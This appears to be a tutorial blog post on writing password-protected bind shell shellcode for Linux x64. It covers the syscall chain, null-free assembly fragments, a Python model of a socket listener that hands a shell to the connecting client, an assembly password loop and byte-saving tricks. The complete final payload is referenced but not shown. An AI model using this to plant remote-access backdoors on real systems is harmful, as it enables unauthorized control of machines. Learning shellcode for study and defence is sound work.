
Stage One: General Overview

First of all, what are we trying to achieve here? Our goal is to write shellcode for the Linux x64 architecture that will open a TCP over IPv4 socket, wait for an incoming connection and execute a shell only after the client provides a valid password.

In order to write a regular bind shell, we need to chain several syscalls. The exact order is the following (we’ll take care of the authentication later):

1- We create a new socket and bind it to the target address using the socket and bind syscalls

2- We make the socket stay open and wait for a connection using the listen syscall

3- Once an incoming connection is received, we use the accept syscall to establish the connection

4- We redirect each standard stream (stdin, stdout and stderr) to the new connection using the dup2 syscall, so the shell on the target machine reads its input from, and writes its output to, the connecting machine

5- We fire a shell by using the execve syscall
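To make the chain concrete before dropping to assembly, here is a minimal Python sketch of the same five steps. It is not the shellcode itself: the function names, the loopback address and the SO_REUSEADDR option are assumptions added for illustration, and port 4444 is simply the one used with netcat later on.

```python
import os
import socket


def make_listener(host="127.0.0.1", port=4444):
    """Steps 1-2: create the socket, bind it, and start listening."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # IPv4, TCP
    # Convenience for repeated test runs; not one of the five steps.
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))   # bind syscall
    srv.listen(1)            # listen syscall
    return srv


def serve_shell(srv):
    """Steps 3-5: accept, dup2 onto stdin/stdout/stderr, execve a shell.

    Blocks until a client connects and does not return on success,
    because execve replaces the current process.
    """
    conn, _addr = srv.accept()             # accept syscall
    for fd in (0, 1, 2):                   # stdin, stdout, stderr
        os.dup2(conn.fileno(), fd)         # dup2 syscall
    os.execve("/bin/sh", ["/bin/sh"], {})  # execve syscall
```

Calling serve_shell(make_listener()) would block until a client connects and then hand that client a shell, which is the behavior the shellcode has to reproduce with raw syscalls.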

Each of these syscalls has a signature we need to honor: specific registers must hold specific values when the syscall instruction executes. The rax register selects the syscall, so it must always contain the syscall number, and the arguments go, in order, in rdi, rsi, rdx, r10, r8 and r9. A whole document containing a full syscall table can be found here.
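As a quick reference, the sketch below lists the x86-64 Linux numbers of the syscalls used in this article and shows which register each argument lands in. The helper name register_layout is hypothetical and exists only for illustration.

```python
# x86-64 Linux syscall numbers for the calls used in this article.
SYSCALLS = {
    "read": 0,
    "close": 3,
    "dup2": 33,
    "socket": 41,   # 0x29
    "accept": 43,
    "bind": 49,
    "listen": 50,
    "execve": 59,
}

# Registers that carry syscall arguments 1..6, in order.
ARG_REGISTERS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")


def register_layout(name, *args):
    """Return the register -> value mapping a syscall invocation needs."""
    if len(args) > len(ARG_REGISTERS):
        raise ValueError("a syscall takes at most six arguments")
    layout = {"rax": SYSCALLS[name]}
    layout.update(zip(ARG_REGISTERS, args))
    return layout


# socket(AF_INET=2, SOCK_STREAM=1, protocol=0)
print(register_layout("socket", 2, 1, 0))
# {'rax': 41, 'rdi': 2, 'rsi': 1, 'rdx': 0}
```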


Stage Two: Writing a Syscall

Let’s see an example of how to execute a syscall.

A Simple Syscall: Socket (0x29)

48c7c029000000 mov rax, 0x29 ; this is the socket syscall number

48c7c702000000 mov rdi, 0x02 ; 0x02 corresponds to AF_INET (IPv4)

4831f6 xor rsi, rsi

48ffc6 inc rsi ; 0x01 corresponds to SOCK_STREAM (TCP)

31d2 xor edx, edx ; protocol 0 selects the default protocol for the socket type

0f05 syscall ; executes the syscall

Now, this code has some issues. First of all, it’s remarkably long (24 bytes, to be precise). Second, it contains a lot of null bytes. Let’s try to fix that!

A More Realistic Approach: Socket (0x29)

The following implementation is 12 bytes long (half the size of the last example) and contains no null bytes:

6a29 push 0x29

58 pop rax ; sets rax to 0x29 without null bytes

6a02 push 0x02

5f pop rdi ; same technique for rdi

6a01 push 0x01

5e pop rsi ; same for rsi

99 cdq ; sign-extends eax into edx; eax is 0x29 (positive), so rdx becomes 0 using just one byte

0f05 syscall
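The sizes and null-byte counts of the two listings can be checked mechanically from the hex encodings shown next to each instruction. The sketch below does exactly that; the helper name measure is an assumption for illustration.

```python
def measure(hex_lines):
    """Return (total_bytes, null_bytes) for a list of hex-encoded instructions."""
    code = b"".join(bytes.fromhex(line) for line in hex_lines)
    return len(code), code.count(0)


# Encodings copied from the two socket listings above.
naive = ["48c7c029000000", "48c7c702000000", "4831f6", "48ffc6", "31d2", "0f05"]
compact = ["6a29", "58", "6a02", "5f", "6a01", "5e", "99", "0f05"]

print(measure(naive))    # (24, 6)
print(measure(compact))  # (12, 0)
```

The null bytes in the first listing all come from the 32-bit immediates of the two mov instructions, which is why the push/pop pairs with 8-bit immediates remove them.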


Stage Three: Writing a Bind Shell

Armed with all our knowledge we now need to chain every syscall together. The following is an example implementation with added comments aimed to clarify each part of the process:

We can check that the bind shell works by assembling and linking this file, then extracting the shellcode and running it. I have some custom scripts that make this a little easier by automating assembly and linking, shellcode extraction, and the generation of test skeletons to run the shellcode in. You may want to check those scripts out and/or use them yourself (and report bugs or suggest improvements, of course!).

Once the shellcode is running, connect from another terminal with netcat using the following command, and a shell should pop up:

nc 127.0.0.1 4444
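If you prefer a scripted check over an interactive netcat session, something along these lines should work. It is a sketch only: the function name run_remote and the two-second timeout are assumptions, and it expects the bind shell to be listening already.

```python
import socket


def run_remote(host, port, command, timeout=2.0):
    """Connect, send one shell command, and return whatever comes back
    before the peer closes or stays quiet for `timeout` seconds."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(command.encode() + b"\n")
        chunks = []
        try:
            while True:
                data = s.recv(4096)
                if not data:          # peer closed the connection
                    break
                chunks.append(data)
        except socket.timeout:        # peer went quiet; assume output is complete
            pass
        return b"".join(chunks)


# Example (requires the bind shell to be running on port 4444):
# print(run_remote("127.0.0.1", 4444, "id").decode())
```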


Stage Four: Adding Authentication

In order to add authentication, we need to read from the client file descriptor and compare the input against a password before executing the shell. The code should look roughly like this:

; 6 - Handle incoming connection

; 6.1 - Save client fd and close parent fd

mov r9, rax ; store the client socket fd into r9

; closing the parent is not mandatory, may be commented out to save some space

push syscalls.close

pop rax ; close parent

syscall

; 6.2 - Read password from the client fd

read_pass:

mov rax, r14 ; read syscall == 0x00

mov rdi, r9 ; from client fd

push 4

pop rdx ; rdx = input size

sub rsp, rdx

mov rsi, rsp ; rsi => buffer

syscall

; 6.3 - Check password

mov rax, config.password

mov rdi, rsi

scasq ; compares rax with the 8 bytes at [rdi] (the read above requests 4)

jne read_pass ; wrong password: read again

Basically, we read from the client file descriptor, then compare the input against a given password and repeat the process until it succeeds.
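The control flow of that loop can be modeled in a few lines of Python. This is a sketch of the logic, not of the assembly: the function name, the 4-byte password b"pass" and the disconnect check are all assumptions added for illustration (the shellcode shown above has no such check).

```python
import socket


def wait_for_password(conn, password):
    """Block until the client sends a chunk equal to `password`.

    Returns the number of attempts. Mirrors the read/compare/jne loop:
    read len(password) bytes, compare, and retry on mismatch.
    """
    attempts = 0
    while True:
        chunk = conn.recv(len(password))
        if not chunk:
            # Added for the sketch so the loop cannot spin on a closed socket.
            raise ConnectionError("client disconnected before authenticating")
        attempts += 1
        if chunk == password:
            return attempts


# Demonstration over a local socket pair (no network needed).
server_end, client_end = socket.socketpair()
client_end.sendall(b"nope")   # wrong guess
client_end.sendall(b"pass")   # hypothetical 4-byte password
print(wait_for_password(server_end, b"pass"))  # 2
server_end.close()
client_end.close()
```

Because the comparison works on fixed-size chunks, a client that sends a longer wrong guess simply has it consumed four bytes at a time until a chunk matches.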

Here’s an example of how to use this auth mechanism:


Stage Five: Reducing the Payload

While working on the initial implementation I avoided null bytes but did not care much about size. At this point the payload is 180 bytes long. To remove null bytes and shrink instructions, I used radare2’s rasm2 utility to compare the encodings of equivalent instructions. Here’s a simple case:

rasm2 -a x86 -b 64 "mov rax,29"

48c7c01d000000

rasm2 -a x86 -b 64 "mov al,29"

b01d
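The two encodings are only interchangeable when the rest of rax is already zero, because writing al leaves the upper 56 bits untouched. The small model below illustrates that precondition; the function names are hypothetical and the register is represented as a plain integer.

```python
MASK64 = (1 << 64) - 1


def mov_r64_imm(_old, imm):
    """mov rax, imm: the whole 64-bit register is replaced."""
    return imm & MASK64


def mov_r8_imm(old, imm):
    """mov al, imm: only the low byte changes, the upper 56 bits are kept."""
    return (old & ~0xFF & MASK64) | (imm & 0xFF)


print(len(bytes.fromhex("48c7c01d000000")))  # 7 bytes for mov rax, 29
print(len(bytes.fromhex("b01d")))            # 2 bytes for mov al, 29

print(hex(mov_r8_imm(0, 29)))                   # 0x1d
print(hex(mov_r8_imm(0xFFFFFFFFFFFFFFFF, 29)))  # 0xffffffffffffff1d
```

In other words, the 2-byte form saves five bytes, but it yields the same value as the full mov only if the register was cleared beforehand.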

I replaced some of the constants in the code, looking for arithmetic instructions that could produce them more cheaply. I used xchg instead of mov reg, reg when conditions allowed it. I also used some x64 registers as constant holders for values that were used repeatedly or were problematic (like 0x00 and 0x10), so I could load those values without having to push them on the stack or perform any arithmetic first, thus saving some bytes. Another trick was to use smaller register sizes when the situation allowed it (like r14d, r14w or r14b instead of the whole r14). The final version looks like this:

This last version is 163 bytes long. There’s probably still a lot of room for improvement here, so I’m open to suggestions!